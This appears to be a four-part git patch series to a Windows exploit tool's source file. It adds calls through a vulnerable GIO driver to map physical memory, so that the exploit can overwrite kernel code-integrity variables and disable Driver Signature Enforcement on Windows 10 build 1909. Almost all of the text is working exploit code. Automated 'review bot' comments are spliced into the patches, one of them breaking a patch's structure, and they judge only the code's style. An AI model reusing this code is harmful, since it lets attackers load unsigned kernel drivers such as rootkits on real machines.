From 731ac3ab94232515b64cbf0e8021e16b071c646f Mon Sep 17 00:00:00 2001
From: Kento Oki
Date: Sat, 2 Oct 2021 14:29:55 +0900
Subject: [PATCH 1/4] implement 1909 build 18363 DSE mitigation

---
 src/swind2.cpp | 105 +++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 105 insertions(+)

diff --git a/src/swind2.cpp b/src/swind2.cpp
index 1dd2d76..32c4260 100644
--- a/src/swind2.cpp
+++ b/src/swind2.cpp
@@ -11,6 +11,8 @@
 #define GIO_DEVICE_NAME L"\\Device\\GIO"
 #define FILE_DEVICE_GIO (0xc350)
 #define IOCTL_GIO_MEMCPY CTL_CODE(FILE_DEVICE_GIO, 0xa02, METHOD_BUFFERED, FILE_ANY_ACCESS)
+#define IOCTL_GIO_GETPHYS CTL_CODE(FILE_DEVICE_GIO, 0xa03, METHOD_BUFFERED, FILE_ANY_ACCESS)
+#define IOCTL_GIO_MAPPHYS CTL_CODE(FILE_DEVICE_GIO, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
 
 // Input struct for IOCTL_GIO_MEMCPY
 typedef struct _GIOMemcpyInput
@@ -20,6 +22,18 @@ typedef struct _GIOMemcpyInput
 ULONG Size;
 } GIOMemcpyInput, *PGIOMemcpyInput;
 
+// Input struct for IOCTL_GIO_MAPPHYS
+#pragma pack (push, 1)
+typedef struct _GIO_MAPPHYS
+{
+ DWORD InterfaceType;
+ DWORD Bus;
+ PVOID PhysicalAddress;
+ DWORD IoSpace;
+ DWORD Size;
+} GIO_MAPPHYS, *PGIO_MAPPHYS;
+#pragma pack (pop)
+
 static WCHAR DriverServiceName[MAX_PATH], LoaderServiceName[MAX_PATH];
 static
@@ -241,6 +255,85 @@ AnalyzeCi(
 return Status;
 }
 
+static
+PVOID
+GetPhysForVirtual(_In_ HANDLE DeviceHandle, _In_ PVOID VirtualAddress)
+{
+ NTSTATUS Status;
+ IO_STATUS_BLOCK IoStatusBlock;
+
+ PVOID Address = VirtualAddress;
+
+ Status = NtDeviceIoControlFile(DeviceHandle,
+ nullptr,
+ nullptr,
+ nullptr,
+ &IoStatusBlock,
+ IOCTL_GIO_GETPHYS,
+ &Address,
+ sizeof(Address),
+ &Address,
+ sizeof(Address));
+ if (!NT_SUCCESS(Status))
+ {
+ Printf(L"NtDeviceIoControlFile(IOCTL_GIO_GETPHYS) failed: error %08X\n", Status);
+ return NULL;
+ }
+
+ return (PVOID)((reinterpret_cast(&Address))->LowPart);
+}
+
+static
+PVOID
+MapPhysicalForVirtual(_In_ HANDLE DeviceHandle, _In_ PVOID PhysicalAddress, _In_ DWORD Size)
+{
+ NTSTATUS Status;
+ IO_STATUS_BLOCK IoStatusBlock;
+
+ GIO_MAPPHYS in = { 0 };
+ RtlZeroMemory(&in, sizeof(in));
+ in.InterfaceType = 0;
+ in.Bus = 0;
+ in.PhysicalAddress = PhysicalAddress;
+ in.IoSpace = 0;
+ in.Size = Size;
+
+ Status = NtDeviceIoControlFile(DeviceHandle,
+ nullptr,
+ nullptr,
+ nullptr,
+ &IoStatusBlock,
+ IOCTL_GIO_MAPPHYS,
+ &in,
+ sizeof(in),
+ &in,
+ sizeof(in));
+ if (!NT_SUCCESS(Status))
+ {
+ Printf(L"NtDeviceIoControlFile(IOCTL_GIO_MAPPHYS) failed: error %08X\n", Status);
+ return NULL;
+ }
+
+ return *reinterpret_cast(&in);
+}
+
+static
+NTSTATUS
+MitigateCiProtectedContent(_In_ HANDLE DeviceHandle, _In_ PVOID* Address)
+{
+ PVOID PhysicalAddress = GetPhysForVirtual(DeviceHandle, *Address);
+ if (!PhysicalAddress)
+ return STATUS_INVALID_ADDRESS;
+
+ PVOID MappedVirtualAddress = MapPhysicalForVirtual(DeviceHandle, PhysicalAddress, sizeof(DWORD));
+ if (!MappedVirtualAddress)
+ return STATUS_INSUFFICIENT_RESOURCES;
+
+ *Address = MappedVirtualAddress;
+
+ return STATUS_SUCCESS;
+}
+
 static int ConvertToNtPath(PWCHAR Dst, PWCHAR Src) // TODO: holy shit this is fucking horrible
 {
 wcscpy_s(Dst, sizeof(L"\\??\\") / sizeof(WCHAR), L"\\??\\");
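Review bot: `MitigateCiProtectedContent` declares its second parameter `_In_ PVOID* Address` but writes through it on the `*Address = MappedVirtualAddress;` line, so the SAL annotation understates the contract; it should be `_Inout_ PVOID* Address`, with a comment above the function such as `// On success *Address is replaced by the virtual address returned for IOCTL_GIO_MAPPHYS; the caller's original value is not preserved.` In `MapPhysicalForVirtual`, the `GIO_MAPPHYS in = { 0 };` initializer, the following `RtlZeroMemory(&in, sizeof(in));` and the explicit `= 0` stores to `InterfaceType`, `Bus` and `IoSpace` all zero the same bytes; a single aggregate initializer, `GIO_MAPPHYS in = { 0, 0, PhysicalAddress, 0, Size };`, says the same thing in one line. The three new functions `return NULL;` while the same bodies pass `nullptr` to `NtDeviceIoControlFile`; one spelling should be used throughout. As rendered here, `reinterpret_cast(&Address)` and `*reinterpret_cast(&in)` show no template argument, presumably angle brackets lost in the page rendering rather than in the source, but the second one also deserves a comment because it reads the result back out of the first pointer-sized bytes of the packed input struct, which silently relies on the driver overwriting its input buffer in place, something this hunk does not let a reader confirm.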
@@ -420,6 +513,18 @@ TriggerExploit(
 *OldCiOptionsValue = OldCiOptions;
 }
 
+ if (NtCurrentPeb()->OSBuildNumber > 18363)
+ {
+ Printf(L"[Build:%d] g_CiProtectedContent mitigation enabled\n", NtCurrentPeb()->OSBuildNumber, *OldCiOptionsValue);
+
+ Status = MitigateCiProtectedContent(DeviceHandle, &CiVariableAddress);
+ if (!NT_SUCCESS(Status))
+ {
+ Printf(L"MitigateCiProtectedContent failed: error %08X\n", Status);
+ goto Exit;
+ }
+ }
+
 // Set up memcpy input a second time, this time for writing
 MemcpyInput.Dst = reinterpret_cast(CiVariableAddress);
 MemcpyInput.Src = CiPatchSize == sizeof(ULONG)
From 4588f439f75b0729bbbf9aa2c7ac53913e917c42 Mon Sep 17 00:00:00 2001
From: Kento Oki
Date: Sat, 2 Oct 2021 14:31:25 +0900
Subject: [PATCH 2/4] implement 1909 build 18363 DSE mitigation

---
 src/swind2.cpp | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/swind2.cpp b/src/swind2.cpp
index 32c4260..c6f6f22 100644
--- a/src/swind2.cpp
+++ b/src/swind2.cpp
@@ -513,7 +513,7 @@ TriggerExploit(
 *OldCiOptionsValue = OldCiOptions;
 }
 
- if (NtCurrentPeb()->OSBuildNumber > 18363)
+ if (NtCurrentPeb()->OSBuildNumber < 18363)
 {
 Printf(L"[Build:%d] g_CiProtectedContent mitigation enabled\n", NtCurrentPeb()->OSBuildNumber, *OldCiOptionsValue);
 
From f2d5e9331534e0cde78db324d3d9ece8d3b2a63f Mon Sep 17 00:00:00 2001
From: Kento Oki
Date: Sat, 2 Oct 2021 14:31:41 +0900
Subject: [PATCH 3/4] implement 1909 build 18363 DSE mitigation

---
 src/swind2.cpp | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/swind2.cpp b/src/swind2.cpp
index c6f6f22..9023687 100644
--- a/src/swind2.cpp
+++ b/src/swind2.cpp
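Review bot: The threshold in the new `if (NtCurrentPeb()->OSBuildNumber > 18363)` line is a bare literal, and the same `18363` recurs in the two later hunks of this series (the one flipping the comparison to `<` and the one trimming the Printf arguments), so the copies can drift apart; a named constant beside the existing `#define`s, e.g. `#define WIN10_1909_BUILD 18363`, used in place of the literal in all three places, plus a one-line comment on the condition stating which builds take this branch and why, would make the check self-describing. The `goto Exit;` on failure assumes an `Exit` label that performs the right cleanup for this point in the function; `TriggerExploit` begins and ends outside this hunk, so that cannot be verified here.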
@@ -11,8 +11,8 @@
 #define GIO_DEVICE_NAME L"\\Device\\GIO"
 #define FILE_DEVICE_GIO (0xc350)
 #define IOCTL_GIO_MEMCPY CTL_CODE(FILE_DEVICE_GIO, 0xa02, METHOD_BUFFERED, FILE_ANY_ACCESS)
-#define IOCTL_GIO_GETPHYS CTL_CODE(FILE_DEVICE_GIO, 0xa03, METHOD_BUFFERED, FILE_ANY_ACCESS)
-#define IOCTL_GIO_MAPPHYS CTL_CODE(FILE_DEVICE_GIO, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
+#define IOCTL_GIO_GETPHYS CTL_CODE(FILE_DEVICE_GIO, 0xa03, METHOD_BUFFERED, FILE_ANY_ACCESS)
+#define IOCTL_GIO_MAPPHYS CTL_CODE(FILE_DEVICE_GIO, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
 
 // Input struct for IOCTL_GIO_MEMCPY
 typedef struct _GIOMemcpyInput
From 13ff5627f55c068b0abc4d9872368bc21475710f Mon Sep 17 00:00:00 2001
From: Kento Oki
Date: Sat, 2 Oct 2021 14:49:25 +0900
Subject: [PATCH 4/4] implement 1909 build 18363 DSE mitigation

---
 src/swind2.cpp | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/swind2.cpp b/src/swind2.cpp
index 9023687..fe50f80 100644
--- a/src/swind2.cpp
+++ b/src/swind2.cpp
@@ -515,7 +515,7 @@ TriggerExploit(
 
 if (NtCurrentPeb()->OSBuildNumber < 18363)
 {
- Printf(L"[Build:%d] g_CiProtectedContent mitigation enabled\n", NtCurrentPeb()->OSBuildNumber, *OldCiOptionsValue);
+ Printf(L"[Build:%d] g_CiProtectedContent mitigation enabled\n", NtCurrentPeb()->OSBuildNumber);
 
 Status = MitigateCiProtectedContent(DeviceHandle, &CiVariableAddress);
 if (!NT_SUCCESS(Status))